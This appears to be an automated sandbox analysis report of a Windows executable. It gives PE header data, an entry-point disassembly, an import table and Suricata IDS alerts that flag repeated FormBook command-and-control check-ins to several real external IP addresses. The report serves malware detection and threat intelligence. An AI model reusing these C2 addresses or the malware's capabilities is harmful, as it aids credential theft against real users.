                                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                    Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                                                                    TLS Callbacks:
                                                                                                                    CLR (.Net) Version:
                                                                                                                    OS Version Major:5
                                                                                                                    OS Version Minor:0
                                                                                                                    File Version Major:5
                                                                                                                    File Version Minor:0
                                                                                                                    Subsystem Version Major:5
                                                                                                                    Subsystem Version Minor:0
                                                                                                                    Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

                                                                                                                    Entrypoint Preview

                                                                                                                    Instruction
                                                                                                                    call 00007FE4F4AD9C3Bh
                                                                                                                    jmp 00007FE4F4AD0AAEh
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    push ebp
                                                                                                                    mov ebp, esp
                                                                                                                    push edi
                                                                                                                    push esi
                                                                                                                    mov esi, dword ptr [ebp+0Ch]
                                                                                                                    mov ecx, dword ptr [ebp+10h]
                                                                                                                    mov edi, dword ptr [ebp+08h]
                                                                                                                    mov eax, ecx
                                                                                                                    mov edx, ecx
                                                                                                                    add eax, esi
                                                                                                                    cmp edi, esi
                                                                                                                    jbe 00007FE4F4AD0C2Ah
                                                                                                                    cmp edi, eax
                                                                                                                    jc 00007FE4F4AD0DC6h
                                                                                                                    cmp ecx, 00000080h
                                                                                                                    jc 00007FE4F4AD0C3Eh
                                                                                                                    cmp dword ptr [004A9724h], 00000000h
                                                                                                                    je 00007FE4F4AD0C35h
                                                                                                                    push edi
                                                                                                                    push esi
                                                                                                                    and edi, 0Fh
                                                                                                                    and esi, 0Fh
                                                                                                                    cmp edi, esi
                                                                                                                    pop esi
                                                                                                                    pop edi
                                                                                                                    jne 00007FE4F4AD0C27h
                                                                                                                    jmp 00007FE4F4AD1002h
                                                                                                                    test edi, 00000003h
                                                                                                                    jne 00007FE4F4AD0C36h
                                                                                                                    shr ecx, 02h
                                                                                                                    and edx, 03h
                                                                                                                    cmp ecx, 08h
                                                                                                                    jc 00007FE4F4AD0C4Bh
                                                                                                                    rep movsd
                                                                                                                    jmp dword ptr [00416740h+edx*4]
                                                                                                                    mov eax, edi
                                                                                                                    mov edx, 00000003h
                                                                                                                    sub ecx, 04h
                                                                                                                    jc 00007FE4F4AD0C2Eh
                                                                                                                    and eax, 03h
                                                                                                                    add ecx, eax
                                                                                                                    jmp dword ptr [00416654h+eax*4]
                                                                                                                    jmp dword ptr [00416750h+ecx*4]
                                                                                                                    nop
                                                                                                                    jmp dword ptr [004166D4h+ecx*4]
                                                                                                                    nop
                                                                                                                    inc cx
                                                                                                                    add byte ptr [eax-4BFFBE9Ah], dl
                                                                                                                    inc cx
                                                                                                                    add byte ptr [ebx], ah
                                                                                                                    ror dword ptr [edx-75F877FAh], 1
                                                                                                                    inc esi
                                                                                                                    add dword ptr [eax+468A0147h], ecx
                                                                                                                    add al, cl
                                                                                                                    jmp 00007FE4F6F49427h
                                                                                                                    add esi, 03h
                                                                                                                    add edi, 03h
                                                                                                                    cmp ecx, 08h
                                                                                                                    jc 00007FE4F4AD0BEEh
                                                                                                                    rep movsd
                                                                                                                    jmp dword ptr [00000000h+edx*4]

                                                                                                                    Rich Headers

                                                                                                                    Programming Language:
                                                                                                                    • [ C ] VS2010 SP1 build 40219
                                                                                                                    • [C++] VS2010 SP1 build 40219
                                                                                                                    • [ C ] VS2008 SP1 build 30729
                                                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                                                    • [ASM] VS2010 SP1 build 40219
                                                                                                                    • [RES] VS2010 SP1 build 40219
                                                                                                                    • [LNK] VS2010 SP1 build 40219

                                                                                                                    Data Directories

                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                    Sections

                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                    .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                    .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                    .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                    Resources

                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                    RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                    RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                    RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                    RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                                                                    RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                                                                    RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                                                                    RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                                                                    RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                                                                    RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                                                                    RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                                                                    RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                                                                    RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                                                                    RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                                                                    RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                                                                    RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                                                                    RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                                                                    RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                                                                                                    RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                    RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                    RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                                                                                                    RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                                                                    RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                                                                                                    RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                                                                                                    RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                                                                                                    RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                                                                                                    RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                                                                                                    RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                                                                                    Imports

                                                                                                                    DLLImport
                                                                                                                    WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                                                    VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                    COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                                                    MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                                                    WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                                                    PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                                                    USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                                                    KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                                                                                    USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                                                                                    GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                                                                                    COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                    ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                                                                                    SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                    ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                                                                                    OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

                                                                                                                    Possible Origin

                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                    EnglishGreat Britain
                                                                                                                    EnglishUnited States

                                                                                                                    Network Behavior

                                                                                                                    Suricata IDS Alerts

                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                    2024-10-09T14:19:08.616111+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44935244.213.25.7080TCP
                                                                                                                    2024-10-09T14:19:08.616111+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44935244.213.25.7080TCP
                                                                                                                    2024-10-09T14:19:24.979387+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449355206.119.82.13480TCP
                                                                                                                    2024-10-09T14:19:27.506452+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449367206.119.82.13480TCP
                                                                                                                    2024-10-09T14:19:30.121686+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449377206.119.82.13480TCP
                                                                                                                    2024-10-09T14:19:32.668658+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449390206.119.82.13480TCP
                                                                                                                    2024-10-09T14:19:32.668658+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449390206.119.82.13480TCP
                                                                                                                    2024-10-09T14:19:39.233538+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44942367.223.117.18980TCP
                                                                                                                    2024-10-09T14:19:41.768077+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44943767.223.117.18980TCP
                                                                                                                    2024-10-09T14:19:44.427932+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44945467.223.117.18980TCP
                                                                                                                    2024-10-09T14:19:46.872552+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44947067.223.117.18980TCP
                                                                                                                    2024-10-09T14:19:46.872552+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44947067.223.117.18980TCP
                                                                                                                    2024-10-09T14:20:00.557302+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4495533.33.130.19080TCP
                                                                                                                    2024-10-09T14:20:03.179954+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4495633.33.130.19080TCP
                                                                                                                    2024-10-09T14:20:05.647658+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4495793.33.130.19080TCP
                                                                                                                    2024-10-09T14:20:09.135196+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4495933.33.130.19080TCP
                                                                                                                    2024-10-09T14:20:09.135196+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4495933.33.130.19080TCP
                                                                                                                    2024-10-09T14:20:15.573819+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449631183.181.83.13180TCP
                                                                                                                    2024-10-09T14:20:18.095551+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449633183.181.83.13180TCP
                                                                                                                    2024-10-09T14:20:21.448100+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449634183.181.83.13180TCP
                                                                                                                    2024-10-09T14:20:23.842524+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449635183.181.83.13180TCP
                                                                                                                    2024-10-09T14:20:23.842524+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449635183.181.83.13180TCP
                                                                                                                    2024-10-09T14:20:29.999500+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44963638.47.232.19680TCP
                                                                                                                    2024-10-09T14:20:32.512036+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44963738.47.232.19680TCP
                                                                                                                    2024-10-09T14:20:35.247466+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44963838.47.232.19680TCP
                                                                                                                    2024-10-09T14:20:37.626584+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44963938.47.232.19680TCP
                                                                                                                    2024-10-09T14:20:37.626584+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44963938.47.232.19680TCP
                                                                                                                    2024-10-09T14:20:44.064387+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4496403.33.130.19080TCP
                                                                                                                    2024-10-09T14:20:45.667999+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4496413.33.130.19080TCP
                                                                                                                    2024-10-09T14:20:48.225838+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4496423.33.130.19080TCP
                                                                                                                    2024-10-09T14:20:51.716612+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4496433.33.130.19080TCP
                                                                                                                    2024-10-09T14:20:51.716612+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4496433.33.130.19080TCP
                                                                                                                    2024-10-09T14:20:58.129652+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449644154.212.219.280TCP
                                                                                                                    2024-10-09T14:21:00.661953+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449645154.212.219.280TCP
                                                                                                                    2024-10-09T14:21:03.232231+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449646154.212.219.280TCP
                                                                                                                    2024-10-09T14:21:05.903310+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449647154.212.219.280TCP
                                                                                                                    2024-10-09T14:21:05.903310+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449647154.212.219.280TCP
                                                                                                                    2024-10-09T14:21:13.023711+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449648133.130.35.9080TCP
                                                                                                                    2024-10-09T14:21:15.543693+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449649133.130.35.9080TCP
                                                                                                                    2024-10-09T14:21:18.271142+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449650133.130.35.9080TCP
                                                                                                                    2024-10-09T14:21:20.647744+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449651133.130.35.9080TCP
                                                                                                                    2024-10-09T14:21:20.647744+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449651133.130.35.9080TCP
                                                                                                                    2024-10-09T14:21:26.327783+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4496523.33.130.19080TCP
                                                                                                                    2024-10-09T14:21:29.874916+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4496533.33.130.19080TCP
                                                                                                                    2024-10-09T14:21:32.399266+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4496543.33.130.19080TCP
                                                                                                                    2024-10-09T14:21:34.967764+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4496553.33.130.19080TCP
                                                                                                                    2024-10-09T14:21:34.967764+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4496553.33.130.19080TCP
                                                                                                                    2024-10-09T14:21:40.994458+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449656172.191.244.6280TCP
                                                                                                                    2024-10-09T14:21:43.770543+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449657172.191.244.6280TCP
                                                                                                                    2024-10-09T14:21:46.255504+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449658172.191.244.6280TCP
                                                                                                                    2024-10-09T14:21:48.803534+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449659172.191.244.6280TCP
                                                                                                                    2024-10-09T14:21:48.803534+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449659172.191.244.6280TCP
                                                                                                                    2024-10-09T14:21:54.748602+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449660162.241.244.10680TCP
                                                                                                                    2024-10-09T14:21:57.326171+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449661162.241.244.10680TCP
                                                                                                                    2024-10-09T14:21:59.854513+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449662162.241.244.10680TCP
                                                                                                                    2024-10-09T14:22:02.484919+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449663162.241.244.10680TCP
                                                                                                                    2024-10-09T14:22:02.484919+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449663162.241.244.10680TCP
                                                                                                                    2024-10-09T14:22:09.654766+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449671199.59.243.22780TCP
                                                                                                                    2024-10-09T14:22:12.189283+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449672199.59.243.22780TCP
                                                                                                                    2024-10-09T14:22:14.726611+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449673199.59.243.22780TCP
                                                                                                                    2024-10-09T14:22:17.290027+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449674199.59.243.22780TCP
                                                                                                                    2024-10-09T14:22:17.290027+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449674199.59.243.22780TCP

                                                                                                                    Network Port Distribution

                                                                                                                    TCP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Oct 9, 2024 14:19:07.413137913 CEST4935280192.168.2.444.213.25.70
                                                                                                                    Oct 9, 2024 14:19:07.418256998 CEST804935244.213.25.70192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:07.418497086 CEST4935280192.168.2.444.213.25.70
                                                                                                                    Oct 9, 2024 14:19:07.432673931 CEST4935280192.168.2.444.213.25.70
                                                                                                                    Oct 9, 2024 14:19:07.437650919 CEST804935244.213.25.70192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:08.596672058 CEST804935244.213.25.70192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:08.615659952 CEST804935244.213.25.70192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:08.615783930 CEST804935244.213.25.70192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:08.616111040 CEST4935280192.168.2.444.213.25.70
